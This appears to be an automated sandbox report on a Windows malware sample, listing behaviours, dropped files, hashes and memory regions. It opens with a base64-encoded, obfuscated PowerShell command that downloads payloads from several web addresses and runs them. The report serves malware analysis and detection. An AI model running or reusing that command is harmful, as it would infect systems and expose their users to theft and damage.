KwAnAHcAJwApACkAKwAnAHcAJwArACgAJwBwAC0AaQBuACcAKwAnAGMAJwApACsAJwBsACcAKwAoACcAdQBkAGUAJwArACcAcwBdAFsAJwApACsAKAAoACcAIAAxACkAIABqACcAKwAnAGoAawBnAFMAIAAnACsAJwBbACcAKwAnAF0AIAAnACkAKQArACcAWwAnACsAKAAoACcAXQB3AFgATgAyAHcAJwArACcAZwAnACsAJwAyADYAJwArACcAdgBdAFsAJwArACcAIAAxACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAJwApACkAKwAoACcAIABbAF0AIABbACcAKwAnAF0AdwAnACsAJwBAACcAKwAnAGgAdAAnACkAKwAoACgAJwB0ACcAKwAnAHAAOgAnACsAJwBdAFsAIAAxACkAIABqACcAKwAnAGoAJwApACkAKwAoACcAawAnACsAJwBnAFMAJwApACsAKAAnACAAWwAnACsAJwBdACAAJwApACsAJwBbAF0AJwArACgAKAAnAHcAXQBbACAAMQAnACsAJwApACcAKwAnACAAagBqACcAKwAnAGsAZwBTACcAKwAnACAAWwAnACkAKQArACgAJwBdACAAWwAnACsAJwBdAHcAJwApACsAKAAnAGgAJwArACcAZQBhAG4AawBhAG4ALgAnACsAJwBiAGkAbwBdAFsAJwApACsAKAAoACcAIAAnACsAJwAxACkAIABqAGoAJwArACcAawBnACcAKQApACsAKAAnAFMAIAAnACsAJwBbAF0AIABbAF0AdwAnACkAKwAnAGoAcwAnACsAKAAnAF0AJwArACcAWwAgADEAJwApACsAKAAoACcAKQAgACcAKwAnAGoAagBrACcAKQApACsAKAAnAGcAUwAgACcAKwAnAFsAXQAnACsAJwAgAFsAXQB3ACcAKQArACgAJwBSAGIAXQBbACcAKwAnACAAJwArACcAMQAnACkAKwAoACgAJwApACcAKwAnACAAagAnACkAKQArACcAagAnACsAKAAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdACcAKwAnAHcAJwApACsAKAAnAEAAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6ACcAKwAnAF0AWwAnACkAKwAnACAAJwArACgAKAAnADEAJwArACcAKQAgAGoAagBrAGcAJwArACcAUwAnACkAKQArACgAJwAgAFsAJwArACcAXQAgAFsAXQAnACsAJwB3ACcAKQArACgAKAAnAF0AWwAgADEAKQAgAGoAJwArACcAagBrACcAKwAnAGcAUwAgACcAKQApACsAKAAnAFsAXQAnACsAJwAgAFsAXQB3AHMAJwArACcAaABlACcAKwAnAGUAbgAnACsAJwAtAHYAaQBlAHQAbgBhAG0AJwArACcALgAnACsAJwB2AG4AJwApACsAKAAnAF0AWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAagAnACsAJwBrACcAKQArACgAJwBnAFMAJwArACcAIABbAF0AJwApACsAKAAnACAAWwBdAHcAJwArACcAdwBwAC0AJwApACsAKAAnAGMAJwArACcAbwBuAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAF0AWwAnACkAKwAnACAAJwArACgAKAAnADEAKQAnACsAJwAgAGoAagBrAGcAUwAnACkAKQArACcAIABbACcAKwAnAF0AIAAnACsAKAAnAFsAXQAnACsAJwB3AHEAdABnADIAJwArACcASgA2AFgAaAAnACkAKwAoACcAWgBdACcAKwAnAFsAIAAnACkAKwAnADEAJwArACgAKAAnACkAIABqAGoAawAnACsAJwBnAFMAIAAnACkAKQArACgAJwBbACcAKwAnAF0AIABbACcAKwAnAF0AdwBAAGgAdAB0AHAAcwAnACsAJwA6ACcAKQArACgAKAAnAF0AWwAgADEAJwArACcAKQAgAGoAagAnACkAKQArACgAJwBrAGcAJwArACcAUwAnACkAKwAoACgAJwAgAFsAXQAgAFsAJwArACcAXQAnACsAJwB3AF0AWwAgADEAKQAgAGoAagBrACcAKwAnAGcAJwApACkAKwAoACcAUwAgAFsAXQAnACsAJwAgAFsAXQB3AG0AJwArACcAYQBkACcAKQArACgAJwByAHUAJwArACcAcwAnACsAJwBoAGQAaQBnACcAKQArACgAJwBpACcAKwAnAHQAYQBsACcAKQArACgAJwAuAGMAJwArACcAbwBtAF0AJwApACsAKAAoACcAWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagAnACkAKQArACgAJwBrAGcAUwAgAFsAJwArACcAXQAgAFsAXQB3AHcAJwArACcAcAAnACsAJwAtAGEAZABtAGkAbgAnACkAKwAoACgAJwBdAFsAIAAxACkAIABqACcAKwAnAGoAawAnACsAJwBnACcAKQApACsAJwBTACcAKwAnACAAJwArACgAJwBbAF0AJwArACcAIAAnACkAKwAnAFsAJwArACgAJwBdAHcAUAAnACsAJwBKACcAKQArACcAaQBdACcAKwAoACcAWwAgACcAKwAnADEAJwApACsAKAAoACcAKQAgAGoAJwArACcAagAnACkAKQArACcAawBnACcAKwAnAFMAIAAnACsAKAAnAFsAXQAnACsAJwAgACcAKQArACcAWwAnACsAKAAoACcAXQB3AEAAaAB0AHQAJwArACcAcABzADoAXQBbACAAJwArACcAMQApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAJwArACcAWwBdAHcAJwArACcAXQBbACAAMQApACcAKQApACsAKAAnACAAagBqACcAKwAnAGsAJwApACsAKAAnAGcAUwAnACsAJwAgAFsAXQAnACkAKwAoACcAIABbAF0AdwAnACsAJwBsACcAKQArACcAdQAnACsAKAAnAG4AYQAnACsAJwBiAGkAdAB1ACcAKQArACgAJwB5ACcAKwAnAGUAbABpAGsALgAnACsAJwBjAG8AbQBdACcAKQArACcAWwAnACsAJwAgACcAKwAnADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagAnACsAKAAnAGoAJwArACcAawBnAFMAIAAnACkAKwAnAFsAXQAnACsAJwAgACcAKwAnAFsAXQAnACsAJwB3ACcAKwAnAHcAJwArACgAJwBwAC0AJwArACcAYwBvAG4AdAAnACkAKwAoACgAJwBlACcAKwAnAG4AdABdAFsAIAAxACkAIABqAGoAawAnACsAJwBnAFMAJwApACkAKwAoACcAIABbACcAKwAnAF0AJwApACsAKAAnACAAWwBdAHcAZgAnACsAJwBXACcAKwAnAGQAMABdACcAKwAnAFsAIAAxACcAKQArACcAKQAnACsAJwAgACcAKwAoACcAagBqACcAKwAnAGsAZwBTACcAKwAnACAAJwApACsAKAAnAFsAXQAgACcAKwAnAFsAXQB3ACcAKQApACkALgAiAHIARQBwAEwAYABBAEMARQAiACgAKAAoACgAKAAnAF0AWwAgADEAJwArACcAKQAgAGoAJwArACcAagBrAGcAUwAnACkAKQArACgAJwAgAFsAJwArACcAXQAnACkAKwAnACAAJwArACcAWwAnACsAJwBdAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAUABgAEwAaQBUACIAKAAkAFoANABuAGQAdgBfADUAIAArACAAJABVADgANAB0AHQANwBjACAAKwAgACQATwA3AHMAdgBwAG4AdwApADsAJABVAHUAaAB1AHMAYwBmAD0AKAAoACcAUgAnACsAJwBxAG8AZABmACcAKQArACcAawA0ACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQBpADUAcQBfAGQAbwAgAGkAbgAgACQAUABnAGEAdABoAHIAYQApAHsAdAByAHkAewAkAE4AdQBwAHIAcgBtADgALgAiAEQAbwBgAHcAbgBgAEwAYABPAEEARABmAEkATABlACIAKAAkAE0AaQA1AHEAXwBkAG8ALAAgACQAWQB1AGwAaAB2AHAAZgApADsAJABRAHQAcQB1ADYAaAA1AD0AKAAnAEEAJwArACcAYwAnACsAKAAnAF8AYgAnACsAJwByAHQAcwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABZAHUAbABoAHYAcABmACkALgAiAGwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAANAAwADYAOAAzACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAzADIAJwArACcAXwAnACkAKwAoACcAUAByAG8AYwAnACsAJwBlACcAKwAnAHMAJwApACsAJwBzACcAKQApAC4AIgBDAFIARQBhAGAAVABlACIAKAAkAFkAdQBsAGgAdgBwAGYAKQA7ACQAQwBtAG8AdgB3AHkAOAA9ACgAJwBGAHAAJwArACgAJwBlAHcAJwArACcAMQAnACkAKwAnAHcAawAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMAA4ADkAYwB1AHYAPQAoACcARgAnACsAKAAnAHQAcQBjAGUAJwArACcAegAnACkAKwAnAGYAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABXAHQAYgA5AG8AcABhAD0AKAAnAE4AJwArACgAJwA5ACcAKwAnAHgANAAxAHAAbAAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeC:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe"C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeMD5
611df3b3942df2c4917cbf8210756860
SHA1ac262f6a83ced5c48fafb39f552f805d6cf5e0ce
SHA2565143bbf39868ca1629040e5c09391b78c9509d19cd236dfc064d6d929cabe6f7
SHA5126480ca141468f6114aff1b4d39386fbd1ff3a1af839b2bb9734187bdbb3d13f05993ab6a491d98fcd1f5a8c4b18252618e60eb0a63765898f6e97e31752f91f2
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeMD5
611df3b3942df2c4917cbf8210756860
SHA1ac262f6a83ced5c48fafb39f552f805d6cf5e0ce
SHA2565143bbf39868ca1629040e5c09391b78c9509d19cd236dfc064d6d929cabe6f7
SHA5126480ca141468f6114aff1b4d39386fbd1ff3a1af839b2bb9734187bdbb3d13f05993ab6a491d98fcd1f5a8c4b18252618e60eb0a63765898f6e97e31752f91f2
-
C:\Windows\SysWOW64\PortableDeviceTypes\rdprefdrvapi.exeMD5
611df3b3942df2c4917cbf8210756860
SHA1ac262f6a83ced5c48fafb39f552f805d6cf5e0ce
SHA2565143bbf39868ca1629040e5c09391b78c9509d19cd236dfc064d6d929cabe6f7
SHA5126480ca141468f6114aff1b4d39386fbd1ff3a1af839b2bb9734187bdbb3d13f05993ab6a491d98fcd1f5a8c4b18252618e60eb0a63765898f6e97e31752f91f2
-
memory/108-1-0x0000000006180000-0x0000000006184000-memory.dmpFilesize
16KB
-
memory/108-2-0x00000000007D1000-0x00000000007D5000-memory.dmpFilesize
16KB
-
memory/108-3-0x00000000007D1000-0x00000000007D5000-memory.dmpFilesize
16KB
-
memory/108-0-0x00000000007D1000-0x00000000007D5000-memory.dmpFilesize
16KB
-
memory/608-5-0x0000000002030000-0x0000000002031000-memory.dmpFilesize
4KB
-
memory/608-8-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/608-9-0x000000001C340000-0x000000001C341000-memory.dmpFilesize
4KB
-
memory/608-10-0x000000001C3D0000-0x000000001C3D1000-memory.dmpFilesize
4KB
-
memory/608-7-0x0000000002070000-0x0000000002071000-memory.dmpFilesize
4KB
-
memory/608-6-0x000000001AE70000-0x000000001AE71000-memory.dmpFilesize
4KB
-
memory/608-4-0x000007FEF4E70000-0x000007FEF585C000-memory.dmpFilesize
9.9MB
-
memory/856-11-0x0000000000000000-mapping.dmp
-
memory/1168-16-0x0000000000000000-mapping.dmp
-
memory/1168-18-0x00000000003A0000-0x00000000003E3000-memory.dmpFilesize
268KB
-
memory/1168-19-0x0000000000570000-0x00000000005B2000-memory.dmpFilesize
264KB
-
memory/1724-13-0x0000000002280000-0x00000000022C3000-memory.dmpFilesize
268KB
-
memory/1724-14-0x00000000022D0000-0x0000000002312000-memory.dmpFilesize
264KB